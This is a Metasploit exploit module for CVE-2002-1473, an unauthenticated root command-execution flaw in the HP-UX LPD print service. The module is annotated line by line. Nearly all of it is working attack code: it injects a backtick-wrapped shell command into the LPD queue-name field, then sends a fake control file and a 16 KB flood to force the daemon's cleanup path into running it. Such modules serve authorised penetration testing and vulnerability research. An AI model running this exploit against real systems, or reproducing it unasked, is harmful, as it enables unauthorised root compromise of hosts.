##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'English'
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  # Module metadata only: name, description, references, payload
  # constraints (200 bytes, NUL/tab/space/slash forbidden, cmd payloads
  # runnable via generic/perl/telnet) and a single automatic target.
  # The only registered option is RPORT, defaulting to the LPD port 515.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'HP-UX LPD Command Execution',
        'Description' => %q{
          This exploit abuses an unpublished vulnerability in the
          HP-UX LPD service. This flaw allows an unauthenticated
          attacker to execute arbitrary commands with the privileges
          of the root user. The LPD service is only exploitable when
          the address of the attacking system can be resolved by the
          target. This vulnerability was silently patched with the
          buffer overflow flaws addressed in HP Security Bulletin
          HPSBUX0208-213.
        },
        'Author' => [ 'hdm' ],
        'References' => [
          ['CVE', '2002-1473'],
          ['OSVDB', '9638'],
          ['URL', 'https://web.archive.org/web/20041213153521/http://archives.neohapsis.com/archives/hp/2002-q3/0064.html'],
        ],
        'Platform' => %w[hpux unix],
        'Arch' => ARCH_CMD,
        'Payload' => {
          'Space' => 200,
          'DisableNops' => true,
          # 0x2f ('/') is excluded because the payload travels inside an
          # LPD queue/file name field; NUL, tab and space delimit fields.
          'BadChars' => "\x00\x09\x20\x2f",
          'Compat' => {
            'PayloadType' => 'cmd',
            'RequiredCmd' => 'generic perl telnet'
          }
        },
        'Targets' => [
          [ 'Automatic Target', {}]
        ],
        'Privileged' => true,
        'DefaultTarget' => 0,
        'DisclosureDate' => '2002-08-28',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          # Each step below is a distinct LPD request; the daemon's own
          # logging is expected to record the job and the failed transfer.
          'SideEffects' => [IOC_IN_LOGS],
          'Reliability' => [REPEATABLE_SESSION]
        }
      )
    )

    register_options([
      Opt::RPORT(515)
    ])
  end

  # Drives a single LPD (RFC 1179) job submission in three steps:
  # receive-job request carrying the payload, a control-file header that
  # announces 32 bytes, then a flood of 16384 bytes that contradicts that
  # length to push the daemon into its error/cleanup path. Each of the
  # first two steps is confirmed by a one-byte 0x00 acknowledgement;
  # anything else aborts via fail_with. The socket is always disconnected
  # in the ensure clause, even when fail_with raises.
  def exploit
    # The job ID is squashed down to three decimal digits
    # $PROCESS_ID is the English-library alias for $$ (see require at top).
    # NOTE(review): `% 1000` bounds the value to at most three digits but does
    # not zero-pad it, so the decimal part may be one or two digits. The
    # suffix is the current epoch time as 8 hex characters ('N' = 32-bit BE).
    jid = ($PROCESS_ID % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0]

    # Connect to the LPD service
    connect

    print_status('Sending our job request with embedded command string...')

    # Send the job request with the encoded command
    # 0x02 is the RFC 1179 "receive a printer job" command; the queue-name
    # field that follows is 3 random alphanumerics, the job id, and the
    # payload wrapped in backticks, terminated by LF.
    sock.put("\x02#{rand_text_alphanumeric(3)}#{jid}`#{payload.encoded}`\n")

    # LPD acknowledges with a single zero octet; any other byte (or no
    # data within the read timeout) is a rejection.
    res = sock.get_once(1)
    if !(res && res[0, 1] == "\x00")
      fail_with(Failure::Unknown, 'The target did not accept our job request')
    end

    print_status('Sending our fake control file...')
    # Receive-job subcommand 0x02 = "receive control file": declares a
    # 32-byte control file named cfA + 8 random alphanumerics.
    sock.put("\x02 32 cfA#{rand_text_alphanumeric(8)}\n")

    # Same one-byte 0x00 acknowledgement check as for the job request.
    res = sock.get_once(1)
    if !(res && res[0, 1] == "\x00")
      fail_with(Failure::Unknown, 'The target did not accept our control file')
    end

    print_status('Forcing an error and hijacking the cleanup routine...')

    # Send far more than the 32 bytes announced above so the daemon takes
    # its error path; the peer may close the connection mid-write.
    begin
      sock.put(rand_text_alphanumeric(16384))
    rescue StandardError
      # request may fail, this is expected
    end
  ensure
    # Runs on both the success path and after fail_with; guard against a
    # connect that never produced a socket.
    disconnect unless sock.nil?
  end
end